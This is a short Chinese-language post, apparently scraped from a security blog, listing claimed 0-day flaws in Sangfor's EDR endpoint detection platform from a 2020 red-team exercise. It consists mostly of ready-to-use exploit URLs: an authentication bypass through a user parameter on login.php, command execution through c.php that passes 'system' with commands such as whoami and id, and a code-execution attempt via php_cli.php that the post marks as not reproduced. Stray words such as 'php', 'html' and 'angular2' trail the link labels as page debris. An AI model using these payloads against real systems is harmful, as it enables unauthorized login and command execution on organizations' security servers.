深信服EDR终端检测响应平台漏洞_2020HW

深信服edr 2020HW 0day

远程命令执行漏洞
远程代码执行漏洞
任意用户登录漏洞

免密码登录 Payload

使用浏览器访问
https://ip:prot/ui/login.php?user=任意字符

原文连接php

远程命令执行

使用浏览器访问
https://ip:prot/tool/log/c.php?strip_slashes=system&host=whoami

https://ip:prot/tool/log/c.php?strip_slashes=system&host=id&path=id&row=id&limit=id

原文连接html

远程代码执行

https://ip:prot/tool/php_cli.php?code=phpinfo();
未复现成功

原文连接浏览器

乾坤未定,你我皆是黑马angular2

相关文章
相关标签/搜索